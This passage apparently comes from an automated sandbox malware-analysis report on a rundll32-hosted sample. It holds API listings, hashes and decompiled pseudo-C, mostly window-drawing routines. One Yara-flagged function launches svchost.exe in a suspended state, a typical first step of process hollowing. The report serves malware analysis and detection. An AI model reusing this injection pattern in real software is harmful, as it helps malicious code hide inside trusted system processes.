                          • WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,0281E749), ref: 027DBB56
                          • GetStdHandle.KERNEL32(000000F4,027DBBC0,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,0281E749), ref: 027DBB6B
                          • WriteFile.KERNEL32(00000000,000000F4,027DBBC0,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,0281E749), ref: 027DBB71
                          • LoadStringA.USER32(00000000,0000FFEC,?,00000040), ref: 027DBB93
                          • MessageBoxA.USER32(00000000,?,?,00002010), ref: 027DBBA9
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: File$HandleLoadModuleNameStringWrite$CharMessageQueryVirtual
                          • String ID:
                          • API String ID: 185507032-0
                          • Opcode ID: 31ee9a039614341e706ac34324cabf9b62f432bd00a0a32ba353ebccfb539564
                          • Instruction ID: ebf35828b1f2cf58cd0a0bb7d3daa4abdcda1c74f13ae490743ad168ba13f95e
                          • Opcode Fuzzy Hash: 31ee9a039614341e706ac34324cabf9b62f432bd00a0a32ba353ebccfb539564
                          • Instruction Fuzzy Hash: 0D1170B5544204BED302FBA4EC49F9F77FEAB45700F804915B695D60E2DB75D904CB22
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E042D2C40(void** _a4, intOrPtr* _a8) {
                          				struct _PROCESS_INFORMATION _v20;
                          				struct _STARTUPINFOA _v88;
                          				char _v348;
                          
                          				E042D14A0( &_v88, 0, 0x44);
                          				_v88.cb = 0x44;
                          				GetEnvironmentVariableA("SystemRoot",  &_v348, 0x104);
                          				lstrcatA( &_v348, "\\System32\\svchost.exe");
                          				if(CreateProcessA(0,  &_v348, 0, 0, 0, 0x424, 0, 0,  &_v88,  &_v20) != 0) {
                          					 *_a4 = _v20.hProcess;
                          					 *_a8 = _v20.hThread;
                          					return 1;
                          				}
                          				return 0;
                          			}







                          APIs
                          • GetEnvironmentVariableA.KERNEL32(SystemRoot,?,00000104), ref: 042D2C71
                          • lstrcatA.KERNEL32(?,\System32\svchost.exe), ref: 042D2C83
                          • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000424,00000000,00000000,00000044,?), ref: 042D2CA9
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.2673527678.00000000042D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_42d0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: CreateEnvironmentProcessVariablelstrcat
                          • String ID: D$SystemRoot$\System32\svchost.exe
                          • API String ID: 3510847443-1175289849
                          • Opcode ID: 7666cfcaf8ae752f94de9e9069de0e85e01071526a1b919cb755aee6a9a52cea
                          • Instruction ID: 41aea1c3ee63f65ec5ee06c77abb689cb8ea5bd17718822650c1257206e42b9b
                          • Opcode Fuzzy Hash: 7666cfcaf8ae752f94de9e9069de0e85e01071526a1b919cb755aee6a9a52cea
                          • Instruction Fuzzy Hash: 65015E75B50309ABE710DFD4DC4AFE97378EB84B05F004154BB09AE2C0EAB46A488B64
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 87%
                          			E02855630(intOrPtr __eax, struct HDC__* __edx, void* __fp0) {
                          				intOrPtr _v8;
                          				intOrPtr _v12;
                          				intOrPtr _v16;
                          				intOrPtr _v20;
                          				char _v21;
                          				struct tagRECT _v37;
                          				struct tagRECT _v53;
                          				void* __edi;
                          				void* __ebp;
                          				intOrPtr _t270;
                          				intOrPtr _t272;
                          				intOrPtr _t459;
                          				intOrPtr _t489;
                          				signed int _t491;
                          				intOrPtr _t498;
                          				struct HDC__* _t531;
                          				intOrPtr _t535;
                          				void* _t537;
                          				void* _t539;
                          				intOrPtr _t540;
                          
                          				_t537 = _t539;
                          				_t540 = _t539 + 0xffffffcc;
                          				_t531 = __edx;
                          				_v8 = __eax;
                          				_t270 = _v8;
                          				_t489 =  *0x2855d18; // 0x0
                          				_t542 = _t489 -  *((intOrPtr*)(_t270 + 0x208));
                          				if(_t489 ==  *((intOrPtr*)(_t270 + 0x208))) {
                          					return _t270;
                          				} else {
                          					_t272 =  *((intOrPtr*)(_v8 + 0x20a));
                          					_t491 =  *((intOrPtr*)(_v8 + 0x209));
                          					_t464 = _t272 + _t491 + _t272 + _t272 + _t491 + _t491 * 2 - 3;
                          					_v21 = _t272 + _t491 + _t272 + _t272 + _t491 + _t491 * 2 - 3;
                          					_t459 =  *((intOrPtr*)(E02855D3C(_v8, _t542) + 0x40));
                          					_t535 =  *((intOrPtr*)(E02855D3C(_v8, _t542) + 0x40));
                          					if(0 > 0xb) {
                          						L9:
                          						_v16 =  *((intOrPtr*)(E02855D3C(_v8, 0 - 0xb) + 0x40));
                          						_v20 =  *((intOrPtr*)(E02855D3C(_v8, 0 - 0xb) + 0x40));
                          						_t459 =  *((intOrPtr*)(E02855D3C(_v8, 0 - 0xb) + 0x40));
                          						_t535 =  *((intOrPtr*)(E02855D3C(_v8, 0 - 0xb) + 0x40));
                          					} else {
                          						switch( *((intOrPtr*)(0 +  &M028556A3))) {
                          							case 0:
                          								_v16 = E028423E4( *((intOrPtr*)(E02855D3C(_v8, 0 - 0xb) + 0x40)), 0x13, __fp0);
                          								_v20 = E028424A4( *((intOrPtr*)(E02855D3C(_v8, 0 - 0xb) + 0x40)), 0xffffffce, __fp0);
                          								goto L10;
                          							case 1:
                          								goto L9;
                          							case 2:
                          								__eax = _v8;
                          								__eax = E02855D3C(_v8, __eflags);
                          								__eax =  *((intOrPtr*)(__eax + 0x40));
                          								__edx = 0xffffffce;
                          								_v16 = __eax;
                          								__eax = _v8;
                          								__eax = E02855D3C(_v8, __eflags);
                          								__eax =  *((intOrPtr*)(__eax + 0x40));
                          								__edx = 0x13;
                          								__eax = E028423E4(__eax, 0x13, __fp0);
                          								_v20 = __eax;
                          								goto L10;
                          							case 3:
                          								__eax = _v8;
                          								__eax = E02855D3C(_v8, __eflags);
                          								__eax =  *((intOrPtr*)(__eax + 0x40));
                          								__edx = 0x13;
                          								__eax = E028423E4(__eax, 0x13, __fp0);
                          								__edx = 0xffffffe2;
                          								__eax = E028424A4(__eax, 0xffffffe2, __fp0);
                          								__eax = _v8;
                          								__eax = E02855D3C(_v8, __eflags);
                          								__eax =  *((intOrPtr*)(__eax + 0x40));
                          								__edx = 0xffffffce;
                          								__eax = E028424A4(__eax, 0xffffffce, __fp0);
                          								__eax = _v8;
                          								__eax = E02855D3C(_v8, __eflags);
                          								__eax =  *((intOrPtr*)(__eax + 0x40));
                          								__edx = 0x13;
                          								_v16 = __eax;
                          								__eax = _v8;
                          								__eax = E02855D3C(_v8, __eflags);
                          								__eax =  *((intOrPtr*)(__eax + 0x40));
                          								__edx = 0xffffffe7;
                          								__eax = E028424A4(__eax, 0xffffffe7, __fp0);
                          								_v20 = __eax;
                          								goto L10;
                          							case 4:
                          								__eax = _v8;
                          								__eax = E02855D3C(_v8, __eflags);
                          								__eax =  *((intOrPtr*)(__eax + 0x40));
                          								__edx = 0x13;
                          								__eax = E028423E4(__eax, 0x13, __fp0);
                          								__eax = _v8;
                          								__eax = E02855D3C(_v8, __eflags);
                          								__eax =  *((intOrPtr*)(__eax + 0x40));
                          								__edx = 0xffffffce;
                          								__eax = E028424A4(__eax, 0xffffffce, __fp0);
                          								__eax = _v8;
                          								__eax = E02855D3C(_v8, __eflags);
                          								__eax =  *((intOrPtr*)(__eax + 0x40));
                          								__edx = 0xffffffce;
                          								_v16 = __eax;
                          								__eax = _v8;
                          								__eax = E02855D3C(_v8, __eflags);
                          								__eax =  *((intOrPtr*)(__eax + 0x40));
                          								__edx = 0x13;
                          								__eax = E028423E4(__eax, 0x13, __fp0);
                          								_v20 = __eax;
                          								goto L10;
                          							case 5:
                          								__eax = _v8;
                          								__eax = E02855D3C(_v8, __eflags);
                          								__eax =  *((intOrPtr*)(__eax + 0x40));
                          								__edx = 0xffffffce;
                          								__eax = E028424A4(__eax, 0xffffffce, __fp0);
                          								__eax = _v8;
                          								__eax = E02855D3C(_v8, __eflags);
                          								__eax =  *((intOrPtr*)(__eax + 0x40));
                          								__edx = 0x13;
                          								__eax = E028423E4(__eax, 0x13, __fp0);
                          								__eax = _v8;
                          								__eax = E02855D3C(_v8, __eflags);
                          								__eax =  *((intOrPtr*)(__eax + 0x40));
                          								__edx = 0x13;
                          								_v16 = __eax;
                          								__eax = _v8;
                          								__eax = E02855D3C(_v8, __eflags);
                          								__eax =  *((intOrPtr*)(__eax + 0x40));
                          								__edx = 0xffffffce;
                          								__eax = E028424A4(__eax, 0xffffffce, __fp0);
                          								_v20 = __eax;
                          								goto L10;
                          							case 6:
                          								__eax = _v8;
                          								__eax = E02855D3C(_v8, __eflags);
                          								__eax =  *((intOrPtr*)(__eax + 0x40));
                          								__edx = 0xffffffce;
                          								__eax = E028424A4(__eax, 0xffffffce, __fp0);
                          								__eax = _v8;
                          								__eax = E02855D3C(_v8, __eflags);
                          								__eax =  *((intOrPtr*)(__eax + 0x40));
                          								__edx = 0x13;
                          								__eax = E028423E4(__eax, 0x13, __fp0);
                          								__eax = _v8;
                          								__eax = E02855D3C(_v8, __eflags);
                          								__eax =  *((intOrPtr*)(__eax + 0x40));
                          								__edx = 0xffffffce;
                          								_v16 = __eax;
                          								__eax = _v8;
                          								__eax = E02855D3C(_v8, __eflags);
                          								__eax =  *((intOrPtr*)(__eax + 0x40));
                          								__edx = 0x13;
                          								__eax = E028423E4(__eax, 0x13, __fp0);
                          								_v20 = __eax;
                          								goto L10;
                          						}
                          					}
                          					L10:
                          					GetClientRect(E02833F7C(_v8),  &_v37);
                          					GetWindowRect(E02833F7C(_v8),  &_v53);
                          					MapWindowPoints(0, E02833F7C(_v8),  &_v53, 2);
                          					OffsetRect( &_v37,  ~(_v53.left),  ~(_v53.top));
                          					ExcludeClipRect(_t531, _v37, _v37.top, _v37.right, _v37.bottom);
                          					OffsetRect( &_v53,  ~(_v53.left),  ~(_v53.top));
                          					_v12 = E027F84EC( *((intOrPtr*)(_v8 + 0x21c)));
                          					_push(_t537);
                          					_push(0x2855d07);
                          					_push( *[fs:eax]);
                          					 *[fs:eax] = _t540;
                          					E027F856C( *((intOrPtr*)(_v8 + 0x21c)), _t531);
                          					E027F7AD0( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x21c)) + 0x10)), _t464, 1, _t531, _t537);
                          					if(( *(_v8 + 0x208) & 0x00000002) != 0 || ( *(_v8 + 0x208) & 0x00000001) != 0 && ( *((intOrPtr*)(_v8 + 0x20a)) - 0xffffffffffffffff < 0 ||  *((char*)(_v8 + 0x20a)) == 0 &&  *((intOrPtr*)(_v8 + 0x209)) - 0xffffffffffffffff < 0)) {
                          						E027F79C4( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x21c)) + 0x10)), _t464, _v16, _t531, _t537);
                          						if(( *(_v8 + 0x208) & 0x00000002) != 0) {
                          							E027F81B0( *((intOrPtr*)(_v8 + 0x21c)), _v53.top, _v53.right);
                          							_t464 = _v53.top;
                          							E027F8150( *((intOrPtr*)(_v8 + 0x21c)), _v53.top, _v53.left - 1);
                          						}
                          						if(( *(_v8 + 0x208) & 0x00000001) != 0) {
                          							E027F81B0( *((intOrPtr*)(_v8 + 0x21c)), _v53.top, _v53.left);
                          							_t464 = _v53.bottom;
                          							E027F8150( *((intOrPtr*)(_v8 + 0x21c)), _v53.bottom, _v53.left);
                          						}
                          					}
                          					if(( *(_v8 + 0x208) & 0x00000002) != 0 || ( *(_v8 + 0x208) & 0x00000001) != 0 &&  *((intOrPtr*)(_v8 + 0x20a)) - 0xffffffffffffffff < 0 &&  *((intOrPtr*)(_v8 + 0x209)) - 0xffffffffffffffff < 0) {
                          						E027F79C4( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x21c)) + 0x10)), _t464, _t459, _t531, _t537);
                          						if(( *(_v8 + 0x208) & 0x00000002) != 0) {
                          							E027F81B0( *((intOrPtr*)(_v8 + 0x21c)), _v53.top + 1, _v53.right - 1);
                          							_t464 = _v53.top + 1;
                          							E027F8150( *((intOrPtr*)(_v8 + 0x21c)), _v53.top + 1, _v53.left + 1);
                          						}
                          						if(( *(_v8 + 0x208) & 0x00000001) != 0) {
                          							E027F81B0( *((intOrPtr*)(_v8 + 0x21c)), _v53.top + 1, _v53.left + 1);
                          							_t464 = _v53.bottom - 2;
                          							E027F8150( *((intOrPtr*)(_v8 + 0x21c)), _v53.bottom - 2, _v53.left + 1);
                          						}
                          					}
                          					if(( *(_v8 + 0x208) & 0x00000008) != 0 || ( *(_v8 + 0x208) & 0x00000004) != 0 && ( *((intOrPtr*)(_v8 + 0x20a)) - 0xffffffffffffffff < 0 ||  *((char*)(_v8 + 0x20a)) == 0 &&  *((intOrPtr*)(_v8 + 0x209)) - 0xffffffffffffffff < 0)) {
                          						E027F79C4( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x21c)) + 0x10)), _t464, _v20, _t531, _t537);
                          						if(( *(_v8 + 0x208) & 0x00000004) != 0) {
                          							E027F81B0( *((intOrPtr*)(_v8 + 0x21c)), _v53.top, _v53.right - 1);
                          							_t464 = _v53.bottom - 1;
                          							E027F8150( *((intOrPtr*)(_v8 + 0x21c)), _v53.bottom - 1, _v53.right - 1);
                          						}
                          						if(( *(_v8 + 0x208) & 0x00000008) != 0) {
                          							E027F81B0( *((intOrPtr*)(_v8 + 0x21c)), _v53.bottom - 1, _v53.right - 1);
                          							_t464 = _v53.bottom - 1;
                          							E027F8150( *((intOrPtr*)(_v8 + 0x21c)), _v53.bottom - 1, _v53.left - 1);
                          						}
                          					}
                          					if(( *(_v8 + 0x208) & 0x00000008) != 0 || ( *(_v8 + 0x208) & 0x00000004) != 0 &&  *((intOrPtr*)(_v8 + 0x20a)) - 0xffffffffffffffff < 0 &&  *((intOrPtr*)(_v8 + 0x209)) - 0xffffffffffffffff < 0) {
                          						E027F79C4( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x21c)) + 0x10)), _t464, _t535, _t531, _t537);
                          						if(( *(_v8 + 0x208) & 0x00000004) != 0) {
                          							E027F81B0( *((intOrPtr*)(_v8 + 0x21c)), _v53.top + 1, _v53.right - 2);
                          							E027F8150( *((intOrPtr*)(_v8 + 0x21c)), _v53.bottom - 2, _v53.right - 2);
                          						}
                          						if(( *(_v8 + 0x208) & 0x00000008) != 0) {
                          							E027F81B0( *((intOrPtr*)(_v8 + 0x21c)), _v53.bottom - 2, _v53.right - 2);
                          							E027F8150( *((intOrPtr*)(_v8 + 0x21c)), _v53.bottom - 2, _v53.left);
                          						}
                          					}
                          					_pop(_t498);
                          					 *[fs:eax] = _t498;
                          					_push(0x2855d0e);
                          					return E027F856C( *((intOrPtr*)(_v8 + 0x21c)), _v12);
                          				}
                          			}
























                          APIs
                          • GetClientRect.USER32(00000000,?), ref: 0285590F
                          • GetWindowRect.USER32(00000000,?), ref: 02855921
                          • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 02855937
                          • OffsetRect.USER32(?,?,?), ref: 0285594C
                          • ExcludeClipRect.GDI32(?,?,?,?,?,?,?,?,00000000,00000000,?,00000002,00000000,?,00000000,?), ref: 02855962
                          • OffsetRect.USER32(?,?,?), ref: 02855977
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: Rect$OffsetWindow$ClientClipExcludePoints
                          • String ID:
                          • API String ID: 435961686-0
                          • Opcode ID: 6333195d9df47132ae8a46444d55f7fd8f0cfcce77fd8033a7dea1c6d7fa4ebb
                          • Instruction ID: f93fa89682251a0528413e0c72158c68ac7491377036a511d1fe7b7a89b2b3d8
                          • Opcode Fuzzy Hash: 6333195d9df47132ae8a46444d55f7fd8f0cfcce77fd8033a7dea1c6d7fa4ebb
                          • Instruction Fuzzy Hash: CB22DA78A041589FDB01EBACC588ADDB7F2AF48300F6545E4E954EB362DB34AE02DF51
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 92%
                          			E028164B8(intOrPtr __eax, intOrPtr* __edx) {
                          				intOrPtr _v8;
                          				intOrPtr* _v12;
                          				struct HWND__* _v16;
                          				int _v20;
                          				signed int _v24;
                          				intOrPtr _v28;
                          				struct HDC__* _v32;
                          				intOrPtr _v36;
                          				intOrPtr _v40;
                          				intOrPtr* _v44;
                          				intOrPtr* _v48;
                          				void* __ebp;
                          				intOrPtr _t125;
                          				signed int _t126;
                          				struct HWND__* _t129;
                          				intOrPtr _t150;
                          				intOrPtr _t153;
                          				signed int _t159;
                          				signed int _t162;
                          				intOrPtr _t168;
                          				intOrPtr _t171;
                          				intOrPtr _t174;
                          				intOrPtr _t176;
                          				intOrPtr _t177;
                          				intOrPtr _t179;
                          				signed int _t185;
                          				void* _t189;
                          				intOrPtr _t193;
                          				intOrPtr _t227;
                          				void* _t261;
                          				intOrPtr _t284;
                          				intOrPtr _t290;
                          				intOrPtr _t297;
                          				void* _t304;
                          				void* _t306;
                          				intOrPtr _t307;
                          				void* _t309;
                          				void* _t313;
                          
                          				_t304 = _t306;
                          				_t307 = _t306 + 0xffffffd4;
                          				_v12 = __edx;
                          				_v8 = __eax;
                          				_t125 =  *_v12;
                          				_t309 = _t125 - 0x46;
                          				if(_t309 > 0) {
                          					_t126 = _t125 - 0xb01a;
                          					__eflags = _t126;
                          					if(_t126 == 0) {
                          						__eflags =  *(_v8 + 0xa0);
                          						if(__eflags != 0) {
                          							E027D3408(_v8, __eflags);
                          						}
                          					} else {
                          						__eflags = _t126 == 1;
                          						if(_t126 == 1) {
                          							__eflags =  *(_v8 + 0xa0);
                          							if(__eflags != 0) {
                          								E027D3408(_v8, __eflags);
                          							}
                          						} else {
                          							goto L41;
                          						}
                          					}
                          					goto L43;
                          				} else {
                          					if(_t309 == 0) {
                          						_t150 = _v8;
                          						_t284 =  *0x2816940; // 0x1
                          						__eflags = _t284 - ( *(_t150 + 0x1c) &  *0x281693c);
                          						if(_t284 == ( *(_t150 + 0x1c) &  *0x281693c)) {
                          							_t153 = _v8;
                          							__eflags =  *((intOrPtr*)(_t153 + 0x230)) - 0xffffffffffffffff;
                          							if( *((intOrPtr*)(_t153 + 0x230)) - 0xffffffffffffffff < 0) {
                          								_t168 = _v8;
                          								__eflags =  *((char*)(_t168 + 0x22b)) - 2;
                          								if( *((char*)(_t168 + 0x22b)) != 2) {
                          									_v36 =  *((intOrPtr*)(_v12 + 8));
                          									_t171 = _v36;
                          									_t41 = _t171 + 0x18;
                          									 *_t41 =  *(_t171 + 0x18) | 0x00000002;
                          									__eflags =  *_t41;
                          								}
                          							}
                          							_t159 =  *((intOrPtr*)(_v8 + 0x230)) - 1;
                          							__eflags = _t159;
                          							if(_t159 == 0) {
                          								L30:
                          								_t162 =  *((intOrPtr*)(_v8 + 0x229)) - 2;
                          								__eflags = _t162;
                          								if(_t162 == 0) {
                          									L32:
                          									_v40 =  *((intOrPtr*)(_v12 + 8));
                          									 *(_v40 + 0x18) =  *(_v40 + 0x18) | 0x00000001;
                          								} else {
                          									__eflags = _t162 == 3;
                          									if(_t162 == 3) {
                          										goto L32;
                          									}
                          								}
                          							} else {
                          								__eflags = _t159 == 2;
                          								if(_t159 == 2) {
                          									goto L30;
                          								}
                          							}
                          						}
                          						goto L43;
                          					} else {
                          						_t129 = _t125 + 0xfffffffa - 3;
                          						if(_t129 < 0) {
                          							__eflags =  *0x2863c8c;
                          							if( *0x2863c8c != 0) {
                          								__eflags =  *_v12 - 7;
                          								if( *_v12 != 7) {
                          									goto L43;
                          								} else {
                          									_t174 = _v8;
                          									__eflags =  *(_t174 + 0x1c) & 0x00000010;
                          									if(( *(_t174 + 0x1c) & 0x00000010) != 0) {
                          										goto L43;
                          									} else {
                          										_v16 = 0;
                          										_t176 = _v8;
                          										__eflags =  *((char*)(_t176 + 0x22f)) - 2;
                          										if( *((char*)(_t176 + 0x22f)) != 2) {
                          											_t177 = _v8;
                          											__eflags =  *(_t177 + 0x220);
                          											if( *(_t177 + 0x220) != 0) {
                          												_t179 = _v8;
                          												__eflags =  *((intOrPtr*)(_t179 + 0x220)) - _v8;
                          												if( *((intOrPtr*)(_t179 + 0x220)) != _v8) {
                          													_v16 = E02833F7C( *((intOrPtr*)(_v8 + 0x220)));
                          												}
                          											}
                          										} else {
                          											_t185 = E02816F24(_v8, _t261);
                          											__eflags = _t185;
                          											if(_t185 != 0) {
                          												_v16 = E02833F7C(E02816F24(_v8, _t261));
                          											}
                          										}
                          										__eflags = _v16;
                          										if(_v16 == 0) {
                          											goto L43;
                          										} else {
                          											_t129 = SetFocus(_v16);
                          										}
                          									}
                          								}
                          							}
                          							goto L44;
                          						} else {
                          							_t189 = _t129 - 0x22;
                          							if(_t189 == 0) {
                          								_v44 =  *((intOrPtr*)(_v12 + 8));
                          								__eflags =  *_v44 - 1;
                          								if( *_v44 != 1) {
                          									goto L43;
                          								} else {
                          									_t193 = _v8;
                          									__eflags =  *(_t193 + 0x248);
                          									if( *(_t193 + 0x248) == 0) {
                          										goto L43;
                          									} else {
                          										_v24 = E0282677C( *((intOrPtr*)(_v8 + 0x248)), 0,  *((intOrPtr*)(_v44 + 8)));
                          										__eflags = _v24;
                          										if(_v24 == 0) {
                          											goto L43;
                          										} else {
                          											_v28 = E027F7E84(0, 1);
                          											_push(_t304);
                          											_push(0x281676c);
                          											_push( *[fs:eax]);
                          											 *[fs:eax] = _t307;
                          											_v20 = SaveDC( *(_v44 + 0x18));
                          											_push(_t304);
                          											_push(0x281674f);
                          											_push( *[fs:eax]);
                          											 *[fs:eax] = _t307;
                          											E027F856C(_v28,  *(_v44 + 0x18));
                          											E027F83E8(_v28);
                          											E02827C64(_v24, _v44 + 0x1c, _v28,  *((intOrPtr*)(_v44 + 0x10)));
                          											_pop(_t290);
                          											 *[fs:eax] = _t290;
                          											_push(0x2816756);
                          											__eflags = 0;
                          											E027F856C(_v28, 0);
                          											return RestoreDC( *(_v44 + 0x18), _v20);
                          										}
                          									}
                          								}
                          							} else {
                          								if(_t189 == 1) {
                          									_v48 =  *((intOrPtr*)(_v12 + 8));
                          									__eflags =  *_v48 - 1;
                          									if( *_v48 != 1) {
                          										goto L43;
                          									} else {
                          										_t227 = _v8;
                          										__eflags =  *(_t227 + 0x248);
                          										if( *(_t227 + 0x248) == 0) {
                          											goto L43;
                          										} else {
                          											_v24 = E0282677C( *((intOrPtr*)(_v8 + 0x248)), 0,  *((intOrPtr*)(_v48 + 8)));
                          											__eflags = _v24;
                          											if(_v24 == 0) {
                          												goto L43;
                          											} else {
                          												_v32 = GetWindowDC(E02833F7C(_v8));
                          												 *[fs:eax] = _t307;
                          												_v28 = E027F7E84(0, 1);
                          												 *[fs:eax] = _t307;
                          												_v20 = SaveDC(_v32);
                          												 *[fs:eax] = _t307;
                          												E027F856C(_v28, _v32);
                          												E027F83E8(_v28);
                          												 *((intOrPtr*)( *_v24 + 0x38))(_v48 + 0x10,  *[fs:eax], 0x281686c, _t304,  *[fs:eax], 0x2816889, _t304,  *[fs:eax], 0x28168b0, _t304);
                          												_pop(_t297);
                          												 *[fs:eax] = _t297;
                          												_push(0x2816873);
                          												__eflags = 0;
                          												E027F856C(_v28, 0);
                          												return RestoreDC(_v32, _v20);
                          											}
                          										}
                          									}
                          								} else {
                          									L41:
                          									_t313 =  *_v12 -  *0x2865b64; // 0xc076
                          									if(_t313 == 0) {
                          										E0282E93C(_v8, 0, 0xb025, 0);
                          										E0282E93C(_v8, 0, 0xb024, 0);
                          										E0282E93C(_v8, 0, 0xb035, 0);
                          										E0282E93C(_v8, 0, 0xb009, 0);
                          										E0282E93C(_v8, 0, 0xb008, 0);
                          										E0282E93C(_v8, 0, 0xb03d, 0);
                          									}
                          									L43:
                          									_t129 = E02831990(_v8, _v12);
                          									L44:
                          									return _t129;
                          								}
                          							}
                          						}
                          					}
                          				}
                          			}










































                          APIs
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: RestoreSave$FocusWindow
                          • String ID:
                          • API String ID: 1553564791-0
                          • Opcode ID: 4b3d985563e67a28fdc01916eee46c825ee419ed0c1848cf89b74d88f229a0ff
                          • Instruction ID: 26e9e28b8202ef0d99762126d69bbcf8843c663882ec1b8fb17c673e362b1cd5
                          • Opcode Fuzzy Hash: 4b3d985563e67a28fdc01916eee46c825ee419ed0c1848cf89b74d88f229a0ff
                          • Instruction Fuzzy Hash: 0EC14C3CA00218DFDB05DFA8D499AADBBF9EB08314F5540A5E488E73A5E734AE41CF50
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 89%
                          			E0285F9D8(intOrPtr __eax, void* __ebx, void* __ecx, struct HDC__* __edx, void* __edi, void* __esi, void* __eflags) {
                          				intOrPtr _v8;
                          				intOrPtr _v12;
                          				intOrPtr _v16;
                          				char _v20;
                          				struct tagRECT _v36;
                          				char _v52;
                          				intOrPtr _v56;
                          				char _v68;
                          				intOrPtr _t224;
                          				void* _t230;
                          				struct tagRECT* _t264;
                          				void* _t266;
                          				intOrPtr _t319;
                          				intOrPtr _t321;
                          				struct HDC__* _t335;
                          				void* _t341;
                          				void* _t343;
                          
                          				_t343 = __eflags;
                          				_t333 = __edi;
                          				_t266 = __ecx;
                          				_t340 = _t341;
                          				_t335 = __edx;
                          				_v8 = __eax;
                          				_t264 =  &_v52;
                          				GetClientRect(E02833F7C(_v8),  &_v36);
                          				GetWindowRect(E02833F7C(_v8), _t264);
                          				MapWindowPoints(0, E02833F7C(_v8), _t264, 2);
                          				OffsetRect( &_v36,  ~(_t264->left),  ~(_t264->top));
                          				ExcludeClipRect(_t335, _v36, _v36.top, _v36.right, _v36.bottom);
                          				OffsetRect(_t264,  ~(_t264->left),  ~(_t264->top));
                          				_v12 = E027F84EC( *((intOrPtr*)(_v8 + 0x21c)));
                          				_push(_t341);
                          				_push(0x285fd1f);
                          				_push( *[fs:eax]);
                          				 *[fs:eax] = _t341 + 0xffffffc0;
                          				E027F856C( *((intOrPtr*)(_v8 + 0x21c)), _t335);
                          				E027F7AD0( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x21c)) + 0x10)), _t266, 1, __edi, _t341);
                          				E027F79C4( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x21c)) + 0x10)), _t266,  *((intOrPtr*)(E02855D3C(_v8, _t343) + 0x7c)), __edi, _t341);
                          				E027F81B0( *((intOrPtr*)(_v8 + 0x21c)), _t264->top, _t264->right);
                          				E027F8150( *((intOrPtr*)(_v8 + 0x21c)), _t264->top, _t264->left);
                          				E027F8150( *((intOrPtr*)(_v8 + 0x21c)), _t264->bottom, _t264->left);
                          				E027F79C4( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x21c)) + 0x10)), _t264->bottom,  *((intOrPtr*)(E02855D3C(_v8, _t343) + 0x78)), __edi, _t341);
                          				E027F81B0( *((intOrPtr*)(_v8 + 0x21c)), _t264->top + 1, _t264->right - 1);
                          				E027F8150( *((intOrPtr*)(_v8 + 0x21c)), _t264->top + 1, _t264->left + 1);
                          				E027F8150( *((intOrPtr*)(_v8 + 0x21c)), _t264->bottom - 2, _t264->left + 1);
                          				E027F79C4( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x21c)) + 0x10)), _t264->bottom - 2,  *((intOrPtr*)(E02855D3C(_v8, _t343) + 0x84)), __edi, _t341);
                          				E027F81B0( *((intOrPtr*)(_v8 + 0x21c)), _t264->top, _t264->right - 1);
                          				E027F8150( *((intOrPtr*)(_v8 + 0x21c)), _t264->bottom - 1, _t264->right - 1);
                          				E027F8150( *((intOrPtr*)(_v8 + 0x21c)), _t264->bottom - 1, _t264->left - 1);
                          				E027F79C4( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x21c)) + 0x10)), _t264->bottom - 1,  *((intOrPtr*)(E02855D3C(_v8, _t343) + 0x80)), __edi, _t340);
                          				E027F81B0( *((intOrPtr*)(_v8 + 0x21c)), _t264->top + 1, _t264->right - 2);
                          				E027F8150( *((intOrPtr*)(_v8 + 0x21c)), _t264->bottom - 2, _t264->right - 2);
                          				E027F8150( *((intOrPtr*)(_v8 + 0x21c)), _t264->bottom - 2, _t264->left);
                          				_t224 = _v8;
